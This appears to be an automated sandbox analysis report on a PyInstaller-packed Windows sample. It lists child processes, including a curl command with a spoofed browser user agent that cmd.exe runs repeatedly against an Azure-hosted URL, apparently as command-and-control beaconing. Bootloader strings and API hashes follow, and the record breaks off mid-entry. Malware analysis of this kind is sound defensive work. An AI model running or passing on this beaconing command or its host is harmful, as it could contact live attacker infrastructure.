Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:39:26
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:39:37
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 2160, Parent PID: 2208

General

Target ID:	15
Start time:	09:39:37
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:39:37
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:39:47
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4080, Parent PID: 4548

General

Target ID:	18
Start time:	09:39:47
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	09:39:47
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:39:58
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7080, Parent PID: 4852

General

Target ID:	21
Start time:	09:39:58
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:39:58
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:40:08
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1364, Parent PID: 5800

General

Target ID:	24
Start time:	09:40:08
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	09:40:08
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	09:40:19
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6836, Parent PID: 6524

General

Target ID:	28
Start time:	09:40:19
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	09:40:19
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	09:40:29
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2672, Parent PID: 6580

General

Target ID:	31
Start time:	09:40:29
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	09:40:29
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	09:40:39
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1716, Parent PID: 2120

General

Target ID:	34
Start time:	09:40:39
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	09:40:40
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	09:40:50
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5272, Parent PID: 5080

General

Target ID:	37
Start time:	09:40:50
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	09:40:50
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	09:41:01
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3448, Parent PID: 3752

General

Target ID:	40
Start time:	09:41:01
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	09:41:01
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 00007FF6399B1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to convert DLL search path!, xrefs: 00007FF6399B38A3
Could not create temporary directory!, xrefs: 00007FF6399B3838
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6399B391A
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6399B36FC
MEI, xrefs: 00007FF6399B374E
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6399B37EF
pkg, xrefs: 00007FF6399B37CF
pyi-contents-directory, xrefs: 00007FF6399B35F8
ERROR: failed to remove temporary directory: %s, xrefs: 00007FF6399B3A12
WARNING: failed to remove temporary directory: %s, xrefs: 00007FF6399B3A31
Failed to start splash screen!, xrefs: 00007FF6399B3933
_MEIPASS2, xrefs: 00007FF6399B36A2, 00007FF6399B36AE, 00007FF6399B39AC
pyi-runtime-tmpdir, xrefs: 00007FF6399B35D3
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6399B3653
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6399B3905
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6399B378C
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6399B3820
pyi-disable-windowed-traceback, xrefs: 00007FF6399B361D

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: FileModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
API String ID: 514040917-585287483
Opcode ID: 23087f7620ac72acd9bdcd02f439b48844b351f26f85b2ee20aa8131ba5e3a6b
Instruction ID: d364db90be8a388034365462ea5b101bf284894601baf5a18f985379861a1fe4
Opcode Fuzzy Hash: 23087f7620ac72acd9bdcd02f439b48844b351f26f85b2ee20aa8131ba5e3a6b
Instruction Fuzzy Hash: EBF15F21A09682A1FB18EF21D5562B96372EF58780F884031DA1DC37DFEF6CE558EB40

Function 00007FF6399D5C74 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6399D59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D59E9
Part of subcall function 00007FF6399D59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D5A67
Part of subcall function 00007FF6399D59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D5AB8

CreateFileW.KERNELBASE ref: 00007FF6399D5D7A
CreateFileW.KERNEL32 ref: 00007FF6399D5DCA
GetLastError.KERNEL32 ref: 00007FF6399D5DFA
GetFileType.KERNELBASE ref: 00007FF6399D5E0F
GetLastError.KERNEL32 ref: 00007FF6399D5E19
CloseHandle.KERNEL32 ref: 00007FF6399D5E4C
CloseHandle.KERNEL32 ref: 00007FF6399D5FAF
CreateFileW.KERNEL32 ref: 00007FF6399D5FE4
GetLastError.KERNEL32 ref: 00007FF6399D5FF3

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction ID: afdebeb15a895550b4458c0aa72b691a7a11d9737ac27262835fe35f779caf53
Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction Fuzzy Hash: 91C1C436B28A4286EB10DF69C4906AC3762FB89B98B050235DF1E977DECF38D451DB10

Function 00007FF6399B85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6399B85D3
FindClose.KERNELBASE ref: 00007FF6399B85E2

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction ID: c18358b8fb7d98efa6b0ee9aacd299903054efabc1aa039fcc7eb63f267f4107
Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction Fuzzy Hash: 8BF06222A2D642C6F7A08F60B48976673A1FB84768F080335DA6D427DDDF3CE4599F04

Function 00007FF6399B18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6399B76A0: _fread_nolock.LIBCMT ref: 00007FF6399B774A

_fread_nolock.LIBCMT ref: 00007FF6399B19B4

Part of subcall function 00007FF6399B2760: MessageBoxW.USER32 ref: 00007FF6399B283B

Strings

malloc, xrefs: 00007FF6399B1AA8
Could not read full TOC!, xrefs: 00007FF6399B1AD4
Error on file., xrefs: 00007FF6399B1B0A
Could not allocate buffer for TOC!, xrefs: 00007FF6399B1AA1
fread, xrefs: 00007FF6399B19C6, 00007FF6399B1ADB
calloc, xrefs: 00007FF6399B19F5
Could not allocate memory for archive structure!, xrefs: 00007FF6399B19EE
fseek, xrefs: 00007FF6399B1990
Failed to seek to cookie position!, xrefs: 00007FF6399B1989
MEI, xrefs: 00007FF6399B1931
Failed to read cookie!, xrefs: 00007FF6399B19BF

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 677216364-3497178890
Opcode ID: a74121b16afc0adfbff040f402fed597cf5b855292c1c24b7a13d399eea61eb6
Instruction ID: 0691383bea9f0e564402ace8bcb2032a4ab56525f73c4c7fda01dcd669eb9f9f
Opcode Fuzzy Hash: a74121b16afc0adfbff040f402fed597cf5b855292c1c24b7a13d399eea61eb6
Instruction Fuzzy Hash: C6716171A18A9689EB60DF14D4902BA23A2EF48784F4C4035D98EC77DFEE2CE545AF40

Function 00007FF6399B15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

malloc, xrefs: 00007FF6399B16F6
fread, xrefs: 00007FF6399B178C
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6399B165B
Failed to extract %s: failed to open target file!, xrefs: 00007FF6399B1617
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6399B168E
fseek, xrefs: 00007FF6399B1695
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6399B16EF
fwrite, xrefs: 00007FF6399B177C
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6399B1775
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6399B1785
fopen, xrefs: 00007FF6399B161E
Failed to create symbolic link %s!, xrefs: 00007FF6399B15E2

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2030045667-1550345328
Opcode ID: 9d449fd5725b51790e10ddf57b734625c92b6598d764827a4f618de3a5d0d32b
Instruction ID: 9e4c4bbbb682ef41f8687e9d242246bb55c0aa68d4ce875493744222d2cb0a94
Opcode Fuzzy Hash: 9d449fd5725b51790e10ddf57b734625c92b6598d764827a4f618de3a5d0d32b
Instruction Fuzzy Hash: D3518E62B0864392EA209F15A8901BA23A6FF44B94F4C4131EE1D877DFEF7CE554AB40

Function 00007FF6399B7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

SetConsoleCtrlHandler.KERNEL32(?,00007FF6399B39C0), ref: 00007FF6399B800A
GetStartupInfoW.KERNEL32(?,00007FF6399B39C0), ref: 00007FF6399B802B

Part of subcall function 00007FF6399C978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C97A0

Part of subcall function 00007FF6399C7A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C7A93

GetCommandLineW.KERNEL32(?,00007FF6399B39C0), ref: 00007FF6399B80CD
CreateProcessW.KERNELBASE ref: 00007FF6399B810F
WaitForSingleObject.KERNEL32(?,00007FF6399B39C0), ref: 00007FF6399B8123
GetExitCodeProcess.KERNEL32 ref: 00007FF6399B8133

Strings

Failed to create child process!, xrefs: 00007FF6399B813F
CreateProcessW, xrefs: 00007FF6399B8146

Memory Dump Source

